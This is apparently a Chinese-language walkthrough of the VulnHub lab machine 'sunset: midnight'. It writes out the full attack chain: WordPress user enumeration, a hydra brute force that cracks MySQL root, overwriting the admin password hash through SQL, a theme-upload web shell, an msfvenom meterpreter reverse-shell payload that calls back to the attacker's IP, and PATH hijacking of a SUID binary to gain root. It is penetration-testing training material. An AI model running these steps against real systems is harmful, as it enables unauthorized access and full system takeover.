vulnhub靶机-sunset：midnight

admin

101103
文章

87
评论

2022年6月27日00:42:47评论162 views字数 1960阅读6分32秒阅读模式

目标主机：192.168.12.211

操作机（kali）：192.168.70.128

首先对目标主机进行端口探测，发现存在22、80、3306等端口信息。

vulnhub靶机-sunset：midnight

然后直接访问80端口http://192.168.12.211/，跳转到http://sunset-midnight/域名地址，所以直接对host文件进行了配置后使用域名直接进行访问。

vulnhub靶机-sunset：midnight

发现看见web服务的网站页面以后，发现其实就是一个WordPress的站点。

vulnhub靶机-sunset：midnight

然后我们尝试使用wpscan对当前站点进行扫描：wpscan --url http://sunset-midnight/，在扫描中发现了一些网站网站路径等相关信息

vulnhub靶机-sunset：midnight

查看一下当前服务的一些指纹信息，根据WordPress的版本信息搜索了一下当前版本存在的一些漏洞信息，然而发现检索的漏洞在当前版本中并不可用。

vulnhub靶机-sunset：midnight

我们并同步对WordPress的用户进行枚举扫描：wpscan --url http://sunset-midnight --enumerate u，我们获取到admin用户是存在的

vulnhub靶机-sunset：midnight

然后我们再对获取到的admin用户尝试进行密码爆破攻击：wpscan --url http://sunset-midnight/ -P password.txt -U admin

vulnhub靶机-sunset：midnight

然而我们并没用成功爆破出密码

vulnhub靶机-sunset：midnight

后来直接尝试对数据库进行爆破攻击：hydra 192.168.12.211 mysql -l root -P password.txt

vulnhub靶机-sunset：midnight

成功爆破出了mysql数据库的用户密码：[3306][mysql] host: 192.168.12.211 login: root password: robert

接下来直接使用了kali远程连接数据库进行操作：mysql -u root -p -h sunset-midnight

vulnhub靶机-sunset：midnight

成功连接了数据库后我们直接操作数据库修改当前WordPress中admin用户的密码信息：

show databases; #查看数据库信息

use wordpress; #定位切换数据库

select userpass from wpusers; #查询当前网站用户密码信息

我们看见数据库用户表中其实只有一条用户数据信息，所以我们直接这条数据的密码进行修改

vulnhub靶机-sunset：midnight

我们将覆盖的密码数据是我们自己想要设置的一个密码进行MD5加密：

update wpusers SET userpass="76a2173be6393254e72ffa4d6df1030a" where id=1; #使用passwd进行MD5加密后去修改之前的密码信息

vulnhub靶机-sunset：midnight

可以看到我们的密码直接修改成功，然后我们就使用我们修改后的密码直接登陆WordPress后台进行getshell操作。

vulnhub靶机-sunset：midnight

通过上传主题文件来getshell 首先先去官网下载一个主题压缩包，之后将执行代码和系统命令的源码写入shell.php中，然后将其放入压缩包一起上传

vulnhub靶机-sunset：midnight

之后访问/wp-content/themes/[主题名]/[shell文件名]即可得到一个shell，成功获取了系统权限

vulnhub靶机-sunset：midnight

然后我们尝试进行shell反弹，使用nc监听非常不稳定，根本无法进行shell连接，尝试使用msf生成getshell的木马文件进行反弹shell：

vulnhub靶机-sunset：midnight

所以下面使用msfvenom生成shell.php，msf进行监听获得shell

访问appearance->add new ->upload theme进行上传

msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.12.128 LPORT=7777 R > getshell.php

vulnhub靶机-sunset：midnight

访问请求shell文件，代码执行后shell获取成功

vulnhub靶机-sunset：midnight

直接进入shell功能，对主机进行信息收集

vulnhub靶机-sunset：midnight

我们通过翻阅了网站的数据库连接文件获取了数据库连接的账号jose和密码

vulnhub靶机-sunset：midnight

然后我们又在系统用户信息中发现存在一个用户与网站数据库连接用户jose相对应

vulnhub靶机-sunset：midnight

然后我们尝试使用数据库连接用户的密码切换到jose用户,直接成功切入。使用 sudo-l查看当前权限，发现jose不能使用sudo。

vulnhub靶机-sunset：midnight

查看SUDI权限的文件：find / -perm -u=s -type f 2>/dev/null

vulnhub靶机-sunset：midnight

由于不能使用sudo命令，所以大多数命令都不能进行提权，但是发现存在一个status命令，并不太常见，执行一下

vulnhub靶机-sunset：midnight

从上面可以看到status使用了service命令，但是为未使用service的绝对路径，所以可以尝试更改$PATH来执行该文件

cd /tmp

echo "/bin/bash" > service

chmod 777 service

echo $PATH

export PATH=/tmp:$PATH #将/tmp添加到环境变量中

status

再次执行之后便成功获得了root权限

vulnhub靶机-sunset：midnight

原文始发于微信公众号（陆吾安全攻防实验室）：vulnhub靶机-sunset：midnight

左青龙
微信扫一扫

右白虎
微信扫一扫

vulnhub靶机-sunset：midnight

漏洞探索/挖掘绕过双因素身份验证

实战环境中的Redis 延时注入

【2024挖矿应急实战】记录一次HW前夕的挖矿病毒应急实战

引入弹性架构，到底是为什么？

一个IP Getshell

渗透测试实战分享

如何将DOM XSS升级为一键帐户接管（上集）

2024年网络威胁概览（05）| 供应链安全：漏洞的连锁反应

xx集团存在弱口令、sql注入、内网突破

TP-Link AC1750 漏洞挖掘的文章（2022）- Pwn2Own 2021

发表评论